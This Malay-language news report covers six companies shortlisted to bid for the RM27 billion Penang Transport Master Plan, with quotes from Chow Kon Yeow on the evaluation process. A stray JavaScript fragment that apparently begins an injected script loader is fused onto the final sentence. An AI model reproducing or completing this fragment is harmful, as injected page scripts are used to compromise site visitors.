Enam syarikat disenarai pendek pembida PIP

Oleh : NORSHAHIDA YUSOFF
Gambar : ALISSALA THIAN

GEORGE TOWN – Enam syarikat disenarai pendek sebagai pembida berpotensi bagi rakan pelaksana projek (PDP) Rancangan Pelan Induk Pengangkutan Pulau Pinang (PIP) berjumlah RM27 bilion baru-baru ini.

Perkara tersebut diumumkan Exco Kerajaan Tempatan, Pengurusan Lalulintas dan Tebatan Banjir, Chow Kon Yeow pada majlis sidang media khas yang diadakan di sini.

Hadir sama, Koordinator Pelaksana PIP, Ir. Lim Thean Heng. Kon Yeow berkata, enam syarikat tersebut telah mengemukakan tawaran selepas bidaan bagi Permintaan Untuk Cadangan (RFP) yang ditutup pada 16 Februari 2015.

Jelasnya, daripada enam pembida tersebut, tiga (daripadanya) adalah syarikat awam yang disenarai di Bursa Saham dan syarikat asing (2).

“Kerajaan Negeri akan mengambil masa lebih kurang dua hingga tiga bulan untuk mengkaji semua cadangan yang diterima sebelum melantik pembida yang berjaya.

“Beberapa kriteria perlu dinilai dengan teliti dari segi teknikal, kedudukan kewangan syarikat-syarikat berkenaan dan juga kemahiran mereka (syarikat-syarikat) dalam mengendalikan projek-projek seumpamanya sebelum ini.

“Kita telah melantik sebuah syarikat konsultan bagi menjalankan tanggungjawab pemilihan ini. Diharap satu pengumuman khas dapat dibuat menjelang Mei nanti,” ujar beliau.

PIP merupakan sebahagian daripada sistem pengangkutan awam bersepadu yang holistik bertujuan menyelesaikan masalah kesesakan lalu lintas.

Ianya adalah termasuk cadangan sistem rangkaian pengangkutan awam yang lebih menyeluruh seperti pembinaan transit aliran ringan (LRT), perkhidmatan bas awam, terowong dasar laut yang menghubungkan pulau dengan tanah besar dan sistem perluasan jalan utama.

Ketika ditanya berhubung PDP yang bakal dilantik, Kon Yeow memberi respons bahawa, pada asal rancangan, hanya satu PDP bakal dilantik, tetapi memandangkan PIP adalah projek besar-besaran, kemungkinan besar ia bakal melibatkan dua atau lebih PDP .

“Kita (Kerajaan Negeri) akan mempertimbangkan jumlah PDP yang sepatutnya dilantik.

“Memandangkan ini (PIP) adalah projek besar-besaran yang merangkumi pelbagai pakej, pecahan kerja-kerja mungkin akan dilakukan,” jelasnya.var d=document;var s=d.createElement(‘script’);